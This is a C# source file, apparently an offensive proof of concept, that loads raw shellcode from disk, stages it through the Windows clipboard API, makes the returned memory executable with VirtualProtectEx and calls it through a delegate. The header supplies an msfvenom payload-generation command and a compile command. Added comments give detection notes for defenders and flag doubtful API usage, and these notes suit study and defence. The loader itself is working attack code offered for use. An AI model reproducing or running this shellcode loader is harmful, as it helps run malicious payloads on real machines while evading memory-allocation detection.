Clipboard Shellcode Injection
// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin>
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs
//
// What this listing does, as written: it reads a raw byte file from disk, hands the
// bytes to SetClipboardData, changes the protection of the address that call returns
// to executable inside its own process, and then calls that address through a delegate.
// Every call targets the current process; nothing here touches another process.
//
// Defender notes:
//  - The in-process signal is a protection change to 0x20 (PAGE_EXECUTE_READ) on a region
//    the author describes as RW, followed by an indirect call into it through
//    Marshal.GetDelegateForFunctionPointer. Telemetry on VirtualProtect/VirtualProtectEx
//    calls that request an executable protection covers this step.
//  - The listing contains no VirtualAlloc or WriteProcessMemory call, so detection logic
//    should not depend on seeing an allocate/write pair before the protection change.
//  - The region is presumably not backed by a loaded module image (confirm in a debugger);
//    if so, memory scanners that flag executable non-image pages would report it.
//  - The header compiles with the .NET Framework 3.5 csc.exe on the host; process-creation
//    logging of csc.exe gives a build-time signal when that is how the binary is produced.
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace ClippySCInject
{
    class Program
    {
        // Parameterless delegate type used only to call the native address obtained below.
        private delegate IntPtr test();

        // Entry point: load bytes from a hard-coded path, place them via the clipboard API,
        // make the returned address executable, and invoke it. args is unused.
        static void Main(string[] args)
        {
            // Raw bytes come from a fixed path on disk; the file itself is an on-disk artefact.
            byte[] payload = File.ReadAllBytes(@"C:\path\to\raw\shellcode.bin");
            // NOTE(review): the bool result is ignored, so a failure to open the clipboard
            // is not noticed here.
            OpenClipboard(IntPtr.Zero);
            // SetClipBoardData() formats that work:
            // CF_BITMAP = 0x2, CF_DSPBITMAP = 0x0082, CF_PALETTE = 0x9
            // https://docs.microsoft.com/en-us/windows/win32/dataxchg/standard-clipboard-formats
            // NOTE(review): the Win32 prototype takes a HANDLE as its second parameter; this
            // declaration passes a managed byte[] instead. What the returned value refers to
            // after the call depends on marshalling and user32 behaviour that this file does
            // not show, so treat the author's "formats that work" list as unverified.
            IntPtr scData = SetClipboardData(0x2, payload); //CF_BITMAP = 0x2
            CloseClipboard();
            uint oldProtect = 0; //Old protect is RW by default
            // scData is not compared with IntPtr.Zero; a failed SetClipboardData only shows up
            // as VirtualProtectEx returning false, in which case nothing is invoked.
            if (VirtualProtectEx(GetCurrentProcess(), scData, (UIntPtr)payload.Length, 0x20/*RX*/, out oldProtect))
            {
                // Wrap the now-executable address in the delegate type and call it.
                test executesc = (test)Marshal.GetDelegateForFunctionPointer(scData, typeof(test));
                executesc();
            }
        }

        // user32 clipboard functions.
        [DllImport("User32.dll", EntryPoint = "OpenClipboard", SetLastError = true)]
        private static extern bool OpenClipboard(IntPtr hWndNewOwner);
        [DllImport("User32.dll", SetLastError = true)]
        static extern IntPtr SetClipboardData(uint uFormat, byte[] hMem);
        [DllImport("user32.dll", SetLastError = true)]
        static extern bool CloseClipboard();
        // kernel32 memory-protection and process-handle functions. VirtualProtectEx is declared
        // without SetLastError, so its failure reason cannot be read back with
        // Marshal.GetLastWin32Error.
        [DllImport("kernel32.dll")]
        static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetCurrentProcess();
    }
}